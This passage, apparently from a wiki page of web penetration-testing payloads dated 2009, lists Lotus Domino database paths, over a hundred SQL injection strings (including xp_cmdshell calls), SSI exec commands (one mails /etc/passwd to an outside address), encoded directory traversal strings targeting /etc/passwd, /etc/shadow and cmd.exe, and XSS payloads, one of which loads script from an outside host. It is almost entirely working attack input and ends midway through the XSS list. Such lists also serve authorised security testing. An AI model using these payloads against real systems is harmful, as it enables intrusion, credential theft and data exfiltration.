/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
